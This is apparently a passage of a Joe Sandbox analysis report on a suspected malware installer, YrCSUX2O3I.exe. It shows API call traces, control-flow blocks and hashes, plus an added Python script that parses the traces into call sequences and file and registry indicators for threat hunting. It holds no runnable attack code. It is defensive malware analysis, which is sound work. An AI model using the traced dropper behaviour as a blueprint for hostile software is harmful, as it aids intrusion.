• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID: : Completed
                                                            • API String ID: 3677997916-2954849223
                                                            • Opcode ID: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                            • Instruction ID: 00e721c797755c7836c6f4ed3256767801ec87f36bc61f3e3d0d9508cf2ebacd
                                                            • Opcode Fuzzy Hash: 1f3307f2cd66b5470d68ce78e0ba5fcfff52b7e5bb41a72ef193ee11c20878df
                                                            • Instruction Fuzzy Hash: 2B015A3114020EEADF218F16ED08EEB3BA8EF45394F00403AF944D6220D735D964CFA9

Control-flow Graph (basic blocks with their in-block calls and successor edges; the executed/not-executed colouring of the rendered graph is not preserved in text)
• 714: 4059fe-405a0a -> 715
• 715: 405a0b-405a3f, GetTickCount, GetTempFileNameW -> 716, 717
• 716: 405a41-405a43 -> 715, 718
• 717: 405a4e-405a50 -> 719
• 718: 405a45 -> 719
• 719: 405a48-405a4b (no successors)
                                                            APIs
                                                            • GetTickCount.KERNEL32 ref: 00405A1C
                                                            • GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CountFileNameTempTick
                                                            • String ID: C:\Users\user\AppData\Local\Temp\$nsa
                                                            • API String ID: 1716503409-2113348990
                                                            • Opcode ID: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                            • Instruction ID: 8deae68b39d669cdf42b1d89707a3c20f7c4236b9c4ece7c5e704d7c998737b8
                                                            • Opcode Fuzzy Hash: 553695d42fa49c729d900ffa62198f8f27b7eacb1895c33b02f4b86faf7ca5f2
                                                            • Instruction Fuzzy Hash: 18F03076710204BBDB008F59DD45E9FB7ACFBD5710F11803AEA45E7290E6B0AA548F64

Control-flow Graph (basic blocks with their in-block calls and successor edges; the executed/not-executed colouring of the rendered graph is not preserved in text)
• 720: 401e51-401e62, call 402ad0, call 404ffa, call 4054c8 -> 726
• 726: 401e67-401e6c -> 727, 728
• 727: 401e72-401e75 -> 730, 731
• 728: 402729-402730 -> 729
• 729: 40295d-40296c (no successors)
• 730: 401ec6-401ecf, CloseHandle -> 728, 729
• 731: 401e77-401e87, WaitForSingleObject -> 733
• 733: 401e97-401e99 -> 734, 735
• 734: 401e89-401e95, call 4060e9, WaitForSingleObject -> 733
• 735: 401e9b-401eab, GetExitCodeProcess -> 737, 738
• 737: 401eba-401ebd -> 730, 742
• 738: 401ead-401eb8, call 405c8d -> 730
• 742: 401ebf -> 730
                                                            APIs
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000,?), ref: 00405032
                                                              • Part of subcall function 00404FFA: lstrlenW.KERNEL32(0040309B,Frisurens,00000000,0041C0DD,76F923A0,?,?,?,?,?,?,?,?,?,0040309B,00000000), ref: 00405042
                                                              • Part of subcall function 00404FFA: lstrcatW.KERNEL32(Frisurens,0040309B,0040309B,Frisurens,00000000,0041C0DD,76F923A0), ref: 00405055
                                                              • Part of subcall function 00404FFA: SetWindowTextW.USER32(Frisurens,Frisurens), ref: 00405067
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040508D
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004050A7
                                                              • Part of subcall function 00404FFA: SendMessageW.USER32(?,00001013,?,00000000), ref: 004050B5
                                                              • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                              • Part of subcall function 004054C8: CloseHandle.KERNEL32(?), ref: 004054FA
                                                            • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                            • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                            • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                            • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                            • String ID:
                                                            • API String ID: 3585118688-0
                                                            • Opcode ID: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                            • Instruction ID: a0a11ceaad45723ae58f2ff6d071e31bf4f47f747fba83561e840ebc81ce61f1
                                                            • Opcode Fuzzy Hash: 7c4fefcebd7ff5f965adf4e7c73dbce6db49c058795d789254a0ae84e323ad35
                                                            • Instruction Fuzzy Hash: D711A131A00205EBDF109FA0CD449DE7AB1EF44315F24413BE605B61E0C7798A92DB99

Control-flow Graph (basic blocks with their in-block calls and successor edges; the executed/not-executed colouring of the rendered graph is not preserved in text)
• 744: 4054c8-4054f5, CreateProcessW -> 745, 746
• 745: 405503-405504 (no successors)
• 746: 4054f7-405500, CloseHandle -> 745
                                                            APIs
                                                            • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
                                                            • CloseHandle.KERNEL32(?), ref: 004054FA
                                                            Strings
                                                            • Error launching installer, xrefs: 004054DB
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID: Error launching installer
                                                            • API String ID: 3712363035-66219284
                                                            • Opcode ID: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                            • Instruction ID: f0c92ffbe574dd0cc69d2483c13c623377a7ee9a819dd8a25a80ea7c4393050c
                                                            • Opcode Fuzzy Hash: e3a99de12ab609f41969ca5042cf5c1fd7ec7a17acfe207451f60b4ef79cfd79
                                                            • Instruction Fuzzy Hash: 19E0ECB4500309ABEB009F64ED49E6B7BBDEB04304F018975A950F2150D774D9148B68
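Each `APIs` record on this page lists one call as `Name.Module(args), ref: address`, with `Part of subcall function` entries for calls made inside callees and the argument slots as the sandbox captured them (`?` for unknown values, 8-digit hex words for pointers and constants, strings where a readable value was on the stack). The following Python script is an added example, not part of the Joe Sandbox report: it parses those records into structured calls, orders the function's own call sites by address, and pulls file paths and registry keys out of the captured slots as indicators. The sample lines are copied from the records above. The hive-constant mapping (80000002 is HKEY_LOCAL_MACHINE) is a standard Windows value; the rule that pairs a hive constant with a key name appearing in the same slot list is this script's own heuristic, since the captured slots are stack contents rather than guaranteed parameter positions.

```python
"""Parse Joe Sandbox 'APIs' records into an ordered call list and IOC strings.

Added example, not part of the report. The sample lines are copied from the
report's records; the classification rules are this script's own.
"""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed sample: lines copied verbatim from the 'APIs' records on this page.
SAMPLE_RECORDS = r"""
• CreateDirectoryW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015E3
• GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015ED
• GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 004015FD
• SetCurrentDirectoryW.KERNELBASE(?,C:\Users\user\AppData\Roaming\Polysulfonate\sangersken\Skolevsens,?,00000000,000000F0), ref: 00401630
• RegOpenKeyExW.KERNELBASE(?,?,00000000,?,?,00000002,: Completed,?,00405E86,80000002,Software\Microsoft\Windows\CurrentVersion,?,: Completed,?), ref: 00405C3D
• GetTickCount.KERNEL32 ref: 00405A1C
• GetTempFileNameW.KERNELBASE(?,?,00000000,?,?,?,00000000,004031DB,1033,C:\Users\user\AppData\Local\Temp\), ref: 00405A37
  • Part of subcall function 004054C8: CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00430200,Error launching installer), ref: 004054ED
"""

# One record per line; the argument list is optional (GetTickCount has none).
RECORD_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)

# Predefined registry hive handles (standard Windows values).
HIVES = {
    "80000000": "HKEY_CLASSES_ROOT",
    "80000001": "HKEY_CURRENT_USER",
    "80000002": "HKEY_LOCAL_MACHINE",
    "80000003": "HKEY_USERS",
}
PATH_RE = re.compile(r"^[A-Za-z]:\\")
REGKEY_RE = re.compile(r"^(?:software|system)\\", re.IGNORECASE)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: str                    # address of the call site inside the sample
    subcall_of: Optional[str]   # set when the call happens inside a callee, not this function


def parse_records(text: str) -> List[ApiCall]:
    """Turn the bullet lines of an 'APIs' record into ApiCall objects; non-matching lines are skipped."""
    calls: List[ApiCall] = []
    for line in text.splitlines():
        m = RECORD_RE.match(line)
        if not m:
            continue
        raw = m.group("args") or ""
        args = [a.strip().strip('"') for a in raw.split(",")] if raw else []
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, m.group("ref").upper(), m.group("sub")))
    return calls


def direct_call_sequence(calls: List[ApiCall]) -> List[str]:
    """API names of the function's own call sites in address order; subcall entries are excluded."""
    own = [c for c in calls if c.subcall_of is None]
    return [c.api for c in sorted(own, key=lambda c: int(c.ref, 16))]


def extract_iocs(calls: List[ApiCall]) -> Dict[str, List[str]]:
    """Collect file-system paths and registry keys seen in the captured argument slots."""
    paths, keys = set(), set()
    for c in calls:
        # Heuristic: a hive constant anywhere in the same slot list qualifies the key name.
        hive = next((HIVES[a] for a in c.args if a in HIVES), None)
        for a in c.args:
            if PATH_RE.match(a):
                paths.add(a)
            elif REGKEY_RE.match(a):
                keys.add(f"{hive}\\{a}" if hive else a)
    return {"paths": sorted(paths), "registry_keys": sorted(keys)}


if __name__ == "__main__":
    parsed = parse_records(SAMPLE_RECORDS)
    print(direct_call_sequence(parsed))
    print(extract_iocs(parsed))
```

Run against a whole report the call sequence per function is what you would compare across samples of the same loader family, while the path and key lists feed straight into a hunt; treat anything derived from a `?`-heavy slot list as a lead to confirm against the dropped-file and registry sections rather than as a finished indicator.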
                                                            APIs
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 0040603D
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,?,?,00000000), ref: 0040604C
                                                              • Part of subcall function 00405FDA: CharNextW.USER32(?,"C:\Users\user\Desktop\YrCSUX2O3I.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406051
                                                              • Part of subcall function 00405FDA: CharPrevW.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031B5,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 00406064
                                                            • CreateDirectoryW.KERNELBASE(C:\Users\user\AppData\Local\Temp\,00000000,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,76F93420,00403390), ref: 004031CA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: Char$Next$CreateDirectoryPrev
                                                            • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                            • API String ID: 4115351271-3283962145
                                                            • Opcode ID: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                            • Instruction ID: 8de04b408351475945b63aae0c0c4e12a59e1662d208add100ced368eac5ea97
                                                            • Opcode Fuzzy Hash: a1a2ae83a12f69ff64746ab71598c024736d7db69addb4c9484161c0f5351619
                                                            • Instruction Fuzzy Hash: ACD09222156936B1D551322A3E06BCF190D8F467AEB22807BF844B90964A6C0AC219FE
                                                            APIs
                                                              • Part of subcall function 00402BDA: RegOpenKeyExW.KERNELBASE(00000000,?,00000000,00000022,00000000,?,?), ref: 00402C02
                                                            • RegQueryValueExW.ADVAPI32(00000000,00000000,?,00000800,?,?,?,?,00000033), ref: 0040240F
                                                            • RegCloseKey.ADVAPI32(?,?,?,C:\Program Files (x86)\edelweissen\romanblade.ini,00000000,?,?,?,?,?,?,?,00000011,00000002), ref: 004024AA
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: CloseOpenQueryValue
                                                            • String ID:
                                                            • API String ID: 3677997916-0
                                                            • Opcode ID: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                            • Instruction ID: a158a5aacad5cf38e27217d247968545a00c68d90011b7c89b18f36f64d1e3ee
                                                            • Opcode Fuzzy Hash: 5e542bf7818b07f6a551f26b0d5f0384b4abb7536ca9c61697919048d63bf7a4
                                                            • Instruction Fuzzy Hash: 4011A371910205EFDB10CFA0D6585AE77B4EF44355F20843FE042A72C0D6B84A85DB1A
                                                            APIs
                                                            • GetFileVersionInfoSizeW.KERNELBASE(00000000,?,000000EE), ref: 00401F17
                                                            • GlobalAlloc.KERNEL32(00000040,00000000), ref: 00401F39
                                                              • Part of subcall function 00405C8D: wsprintfW.USER32 ref: 00405C9A
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: AllocFileGlobalInfoSizeVersionwsprintf
                                                            • String ID:
                                                            • API String ID: 1691843260-0
                                                            • Opcode ID: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                            • Instruction ID: 8ab53c93760d54e15c8d206721566b5ff93d1c6769f111ab103972edef9fb44c
                                                            • Opcode Fuzzy Hash: 3e36e6059fa465f8b0de5d4d74652fe28b5c7b8050137b23430cd001ac3cf941
                                                            • Instruction Fuzzy Hash: B8114871A00109BFDB01DFA5CD44CAEBBB9EF44354F10407AF901E62E1E7789A50DB68
                                                            APIs
                                                            • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                            • SendMessageW.USER32(00000402,00000402,00000000), ref: 004013F4
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: MessageSend
                                                            • String ID:
                                                            • API String ID: 3850602802-0
                                                            • Opcode ID: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                            • Instruction ID: adb52dfa00387397cd87161f5118bdb5a91708942fcdcec178a456792abf2482
                                                            • Opcode Fuzzy Hash: da452d76ac9ea1a5bb0b486d2f6a108081b9f7ccbaee280f2a8f0c090cfa8d80
                                                            • Instruction Fuzzy Hash: 5101F4316202209BE7095B389D09B6A76D8E711719F10863FF851F72F1D6B8CC429B4C
                                                            APIs
                                                            • OleInitialize.OLE32(00000000), ref: 004050DD
                                                              • Part of subcall function 00403FE1: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00403FF3
                                                            • CoUninitialize.COMBASE(00000404,00000000), ref: 00405129
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1402107652.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000000.00000002.1402083642.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402128265.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000431000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.000000000043F000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402215581.0000000000451000.00000004.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000455000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000465000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000467000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.000000000046E000.00000002.00000001.01000000.00000003.sdmp
                                                            • Associated: 00000000.00000002.1402506426.0000000000475000.00000002.00000001.01000000.00000003.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_400000_YrCSUX2O3I.jbxd
                                                            Similarity
                                                            • API ID: InitializeMessageSendUninitialize
                                                            • String ID:
                                                            • API String ID: 2896919175-0
